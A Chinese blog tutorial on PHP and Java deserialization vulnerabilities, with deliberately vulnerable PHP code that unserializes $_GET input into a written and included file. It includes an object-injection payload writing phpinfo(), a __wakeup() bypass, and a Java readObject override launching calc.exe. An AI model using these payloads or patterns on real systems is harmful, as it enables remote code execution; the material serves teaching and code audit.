通用反序列化

各种语言都有反序列化漏洞

序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象

也就是把数据转化为一种可逆的数据结构,再把这种可逆的数据结构转化回数据,这就是序列化与反序列化

看到过一个通用的例子(可以应用到很多场景中,比如网络数据包传递接收过程之类的),买一个柜子,从北京运到上海,由于柜子形状怪异,不方便运输,先把它拆成板子,再装到箱子里,顺丰邮到买家手里,把板子拼装回柜子

 

0x01PHP反序列化漏洞(PHP对象注入漏洞)

PHP通过serialize() 与 unserialize()实现序列化与反序列化

常见的反序列化漏洞中出现的魔术方法及其触发条件

__construct()当一个对象创建时被调用

__destruct()当一个对象销毁时被调用

__toString()当一个对象被当作一个字符串时使用

__sleep() 在对象在被序列化之前运行

__wakeup() 如果有,在反序列化之前调用

 

友情提示:

private属性序列化的时候格式是 %00类名%00成员名  如testname  (test->类名name->成员名)

protected属性序列化的时候格式是 %00*%00成员名    如*name   (name->成员名)

序列化只序列化属性,不序列化方法,因此 反序列化的时候要保证在当前的作用域环境下有该类存在,类属性就是唯一的攻击突破口

(上文提到的__toString()触发条件非常多)

 

复制代码

<?php   

class test{

    public $name = 'lcx';

    function __construct(){

        echo "__construct()";

        echo "<br><br>";

    }

    function __destruct(){

        echo "__destruct()";

        echo "<br><br>";

    }

    function __wakeup(){

        echo "__wakeup()";

        echo "<br><br>";

    }

    function __toString(){

        return "__toString()"."<br><br>";

    }

    function __sleep(){

        echo "__sleep()";

        echo "<br><br>";

        return array("name");

    }

}

$test1 = new test();

$test2 = serialize($test1);

print($test2);

$test3 = unserialize($test2);

print($test3);

?>

复制代码

判断一下魔术方法运行顺序

 

 

 

 

关于PHP序列化输出结果举例

复制代码

<?php
$a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut');
 
//序列化数组
$s = serialize($a);
echo $s;
?>

复制代码

运行结果为a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c";s:7:"Coconut";}
数组:3个对象:{1个字符串类型a;5个字符串类型Apple;以此类推}
 

反序列化与之相反,不举例了

 

那么什么情况下会出现反序列化漏洞呢?

借鉴了大佬的一个经典案例来说明,经典永流传     (文件起名为1.php,   PHP中var关键字在类内部等同于public)

复制代码

 <?php 
 class Test{
     var $test = "123";
     function __wakeup(){
         $fp = fopen("test.php", 'w');
         fwrite($fp, $this -> test);
         fclose($fp);
     }
 }
 
 $test1 = $_GET['test'];
print_r($test1);
 echo "<br />";
 $seri = unserialize($test1);

 require "test.php";

 ?>

复制代码

构造payload

O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}

1.php?test=O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}

 

传了Test类有一个test参数 test="<?php phpinfo();?>";

O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}

如图所示

 

$test1是我可控的没有任何过滤,我传了一个Test类,里面有一个test参数等于"<?php phpinfo();?>"

由于代码中写了__wakeup()

上文提到,有__wakeup(),在反序列化之前一定会调用此方法,创建了一个test.php文件,并把Test类中的test变量的值即"<?php phpinfo();?>" 写进了test.php文件,require进行文件包含

(想起来一个事,关于__wakeup(),以前遇到CTF的一个题用到了这个知识点

有当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行,即:

O:4:"Test":2:{s:4:"test";s:18:"<?php%20phpinfo();?>";}这种  你就会绕过__wakeup(),__wakeup()内部全都不会执行啦 不信你可以试试

 

这就是一个非常典型的反序列化漏洞

其他魔术方法同理

复制代码

<?php 
class Test1{
    function __construct($test){
        $fp = fopen("shell.php", "w");
        fwrite($fp, $test);
        fclose($fp);
    }
}

class Test2{
    var $test = "123";
    function __wakeup(){
        $obj = new Test1($this -> test);
    }
}

$test = $_GET['test'];
unserialize($test);

require "shell.php";
?>

复制代码

再比如上边这个__construct()

与第一个例子用 一样的payload  一样的感觉

 

其实真正造成危险的代码在魔术方法中,上面两个例子用了新建文件操作,后面还有文件包含操作,由于魔术方法往往伴随某些条件自动调用,所以。。。

那么是不是说一些执行操作的代码片段不放在魔术方法中就安全了,也不一定

一些方法互相调用,可能调用来调用去,还是会执行某些操作

 

总结一下PHP反序列化漏洞出现的原因:
1.unserialize()传入参数可控

2.存在某些魔术方法可用

3.没有过滤或者过滤不完善

 

一般有反序列化函数内部都有 正则过滤(泪目)或者啥过滤,没有就会给构造payload绕过以可乘之机

 

 

0x02 Java反序列化漏洞

有两个类:

  • Java.io.ObjectOutputStream
  • Java.io.ObjectInputStream

这俩是Java中实现序列化与反序列化的关键类

 

序列化用到了ObjectOutputStream类中的writeObject()

反序列化用到了ObjectInputStream类中的readObject()

 

 

借大佬的代码举个例子

复制代码

import java.io.*;

/*
import java.io.ObjectOutputStream;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.FileInputStream;
*/

public class Test{

    public static void main(String args[]) throws Exception {
        String obj = "helloworld";

        // 将序列化对象写入文件中
        FileOutputStream fos = new FileOutputStream("lcx.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(obj);
        os.close();

        // 从文件中读取数据
        FileInputStream fis = new FileInputStream("lcx.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        // 通过反序列化恢复对象
        String obj2 = (String)ois.readObject();
        System.out.println(obj2);
        ois.close();
    }

}

复制代码

创建文件,把序列化数据写入文件,读取文件,反序列化数据,打印数据

 

 

实现Serializable和Externalizable接口的类的对象才能被序列化

Externalizable接口继承自 Serializable接口,实现Externalizable接口的类完全由自身来控制序列化的行为,而仅实现Serializable接口的类可以采用默认的序列化方式

对象序列化包括如下步骤:
  1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流;
  2) 通过对象输出流的writeObject()方法写对象

对象反序列化的步骤如下:
  1) 创建一个对象输入流,它可以包装一个其他类型的源输入流,如文件输入流;
  2) 通过对象输入流的readObject()方法读取对象

更进一步,把文件变成类

复制代码

import java.io.*;
public class test{
    public static void main(String args[]) throws Exception{

        UnsafeClass Unsafe = new UnsafeClass();
        Unsafe.name = "my name is lcx";

        FileOutputStream fos = new FileOutputStream("object");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        //writeObject()方法将Unsafe对象写入object文件
        os.writeObject(Unsafe);
        os.close();
        //从文件中反序列化obj对象
        FileInputStream fis = new FileInputStream("object");
        ObjectInputStream ois = new ObjectInputStream(fis);
        //恢复对象
        UnsafeClass objectFromDisk = (UnsafeClass)ois.readObject();
        System.out.println(objectFromDisk.name);
        ois.close();
    }
}

class UnsafeClass implements Serializable{
    public String name;
    //重写readObject()方法
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
        //执行默认的readObject()方法
        in.defaultReadObject();
        //执行命令
        Runtime.getRuntime().exec("calc.exe");
    }
}

复制代码

UnsafeClass实例化的对象被序列化进object文件

再被读取并反序列化

执行了重写后的readObject方法,显示 my name is lcx 并弹出了计算器

 

Java反序列化漏洞和所有反序列化漏洞一样,都是由于对用户提供的、不可信的数据进行了反序列化处理,没做任何处理产生了非预期对象,带来了某些代码执行

 

有几个经典的例子:Apache Commons Collections序列化RCE漏洞、Spring框架反序列化漏洞、Fastjson反序列化漏洞、 Apache Shiro Java 反序列化漏洞(具体的不展开了,网上某某社区也有不少大佬写的poc很好很全面,Java玩的不好就不班门弄斧误人子弟了)

 

反序列化操作一般在导入模版文件、网络通信、数据传输、日志格式化存储、对象数据落磁盘或DB存储等业务场景,在代码审计时可重点关注一些反序列化操作函数并判断输入是否可控,如

ObjectInputStream.readObject 、ObjectInputStream.readUnshared 、XMLDecoder.readObject 、Yaml.load、 XStream.fromXML 、ObjectMapper.readValue 、JSON.parseObject,还有一些第三方库提供的反序列化操作接口

 

实际上,基本不会存在一个系统从外部直接读取什么对象序列化之后传输,可能存在比如说有对象被序列化后作为cookie的一部分传了进去,那我们可以构造cookie达到利用的目的

 

白盒找接收外部输入的序列化对象的接收点(比如ObjectInputStream对象的初始化参数来自外部请求输入参数则基本可以确定存在反序列化漏洞了),也是反序列化的触发点。找对反序列化的函数调用(比如反序列化时的readObject()方法是否重写,重写中是否有设计不合理,可以被利用之处),看是不是有危险库,有的话利用相关方法搞一搞

 

黑盒抓交互流量数据,java序列化数据的特征大多以标记(ac ed 00 05    00 05是版本号  base64编码为rO0AB)开头。 Java RMI 的传输 100% 基于反序列化,Java RMI 的默认端口是1099端口,有大佬写的脚本对1099端口进行扫描攻击

另外还有工具ysoserial,擅长构造多种payload

 

Java序列化传输方式,用burp抓包会在hex编码中找到特征码ac ed 00 05,数据显示也会比较奇怪混杂大量字符和空白,这就是序列化传递的一种流量特征

我们或许可以用工具ysoserial生成payload,改包向服务器发送请求

 

找了个例子

           2020网鼎杯 朱雀组Web 之 think java

感兴趣可以搞一搞

 

 0x03其他后续补充

 

关于PHP反序列化,这位师傅总结得很详细,比我详细,补充了很多我没提到的,给大佬一个赞

请参考:

https://www.cnblogs.com/bmjoker/p/13742666.html

https://www.cnblogs.com/bmjoker/p/13831713.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值